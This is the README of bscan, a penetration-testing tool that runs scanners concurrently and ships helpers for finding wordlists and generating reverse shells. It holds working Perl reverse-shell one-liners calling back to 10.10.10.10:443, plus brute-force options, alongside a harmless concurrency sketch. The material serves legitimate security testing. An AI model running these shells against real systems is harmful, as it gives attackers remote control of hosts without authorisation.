Bscan - An Asynchronous Target Enumeration Tool
bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.

Installation
bscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.

Download the latest packaged version from PyPI:

    pip install bscan

Or install from the master archive on GitHub:

    pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage
bscan has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:

    $ bscan \
    > --max-concurrency 3 \
    > --patterns [Mm]icrosoft \
    > --status-interval 10 \
    > --verbose-status \
    > scanme.nmap.org

- --max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time
- --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
- --status-interval 10 tells bscan to print runtime status updates every 10 seconds
- --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
- scanme.nmap.org is the host upon which we want to enumerate

bscan also relies on some additional configuration files. The default files can be found in the bscan/configuation directory and serve the following purposes:

- patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
- required-programs.txt specifies the installed programs that bscan plans on using
- port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
- service-scans.toml defines the scans to be run on the target(s) on a per-service basis

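An added example, not bscan's own code: a minimal sketch of the behaviour that --max-concurrency, --patterns and the port-parsing regexes in port-scans.toml describe, using a semaphore to cap concurrent subprocesses. The names SAMPLE, PORT_RE, run_job and enumerate_all are hypothetical, the "scanner" is a child Python process that prints constructed text, and nothing touches the network.

```python
import asyncio
import re
import sys

# Constructed sample in nmap's "PORT STATE SERVICE" layout (not real scan data).
SAMPLE = "PORT STATE SERVICE\n22/tcp open ssh\n80/tcp open http\n445/tcp open microsoft-ds\n"
# Hypothetical parsing regex; bscan's real expressions live in port-scans.toml.
PORT_RE = re.compile(r"^(?P<port>\d+)/tcp\s+open\s+(?P<service>\S+)", re.M)


def highlight(text, patterns):
    """Wrap each match of the user-supplied regexes in ANSI bold red."""
    combined = re.compile("|".join(f"(?:{p})" for p in patterns))
    return combined.sub(lambda m: f"\033[1;31m{m.group(0)}\033[0m", text)


async def run_job(name, sem, stats):
    """Spawn one child process; the semaphore caps how many run at once."""
    async with sem:
        stats["running"] += 1
        stats["peak"] = max(stats["peak"], stats["running"])
        try:
            # Stand-in for a scanner: a child Python that prints SAMPLE.
            proc = await asyncio.create_subprocess_exec(
                sys.executable, "-c",
                f"import time; time.sleep(0.1); print({SAMPLE!r})",
                stdout=asyncio.subprocess.PIPE)
            out, _ = await proc.communicate()
        finally:
            stats["running"] -= 1
    text = out.decode()
    found = [(int(m["port"]), m["service"]) for m in PORT_RE.finditer(text)]
    return name, found, highlight(text, [r"[Mm]icrosoft"])


async def enumerate_all(names, max_concurrency=3):
    sem = asyncio.Semaphore(max_concurrency)
    stats = {"running": 0, "peak": 0}
    results = await asyncio.gather(*(run_job(n, sem, stats) for n in names))
    return list(results), stats["peak"]


def demo():
    return asyncio.run(enumerate_all([f"job{i}" for i in range(8)]))


if __name__ == "__main__":
    results, peak = demo()
    print("peak concurrent subprocesses:", peak, results[0][2], sep="\n")
```

Eight jobs are queued but the recorded peak never exceeds the semaphore limit, which is the property a concurrency cap gives you when each child is a heavyweight scanner.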
Detailed Options
Here's what you should see when running bscan --help:

    usage: bscan [OPTIONS] targets

     _
    | |__  ___  ___ __ _ _ __
    | '_ \/ __|/ __/ _` | '_ \
    | |_) \__ \ (__ (_| | | | |
    |_.__/|___/\___\__,_|_| |_|

    an asynchronous service enumeration tool

    positional arguments:
      targets               the targets and/or networks on which to perform
                            enumeration

    optional arguments:
      -h, --help            show this help message and exit
      --brute-pass-list F   filename of password list to use for brute-forcing
      --brute-user-list F   filename of user list to use for brute-forcing
      --cmd-print-width I   the maximum integer number of characters allowed when
                            printing the command used to spawn a running
                            subprocess (defaults to 80)
      --config-dir D        the base directory from which to load the
                            configuration files; required configuration files
                            missing from this directory will instead be loaded
                            from the default files shipped with this program
      --hard                force overwrite of existing directories
      --max-concurrency I   maximum integer number of subprocesses permitted to be
                            running concurrently (defaults to 20)
      --no-program-check    disable checking the presence of required system
                            programs
      --no-file-check       disable checking the presence of files such as
                            configured wordlists
      --no-service-scans    disable running scans on discovered services
      --output-dir D        the base directory in which to write output files
      --patterns [ [ ...]]  regex patterns to highlight in output text
      --ping-sweep          enable ping sweep filtering of hosts from a network
                            range before running more intensive scans
      --quick-only          whether to only run the quick scan (and not include
                            the thorough scan over all ports)
      --qs-method S         the method for performing the initial TCP port scan;
                            must correspond to a configured port scan
      --status-interval I   integer number of seconds to pause in between printing
                            status updates; a non-positive value disables updates
                            (defaults to 30)
      --ts-method S         the method for performing the thorough TCP port scan;
                            must correspond to a configured port scan
      --udp                 whether to run UDP scans
      --udp-method S        the method for performing the UDP port scan; must
                            correspond to a configured port scan
      --verbose-status      whether to print verbose runtime status updates, based
                            on frequency specified by `--status-interval` flag
      --version             program version
      --web-word-list F     the wordlist to use for scans

Companion Tools
The main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.

bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:

    $ bscan-wordlists --find "*win*"
    /usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
    /usr/share/wordlists/metasploit/sensitive_files_win.txt
    /usr/share/seclists/Passwords/common-passwords-win.txt

Try bscan-wordlists --help to explore other options.

bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:

    $ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
    perl for windows
    perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$ ->fdopen($c,w);system$_ while<>;'
    perl with /bin/sh
    perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    perl without /bin/sh
    perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$ ->fdopen($c,w);system$_ while<>;'

bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.

Development
Start by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):

    # set up the environment
    mkvirtualenv -p $(which python3) bscan-dev
    workon bscan-dev

    # get the deps
    pip install -r dev-requirements.txt

Lint and type-check the project:

    flake8 . && mypy bscan

    # build source and wheel distributions
    python setup.py bdist_wheel sdist

    # run post-build checks
    twine check dist/*

    # upload to PyPI
    twine upload dist/*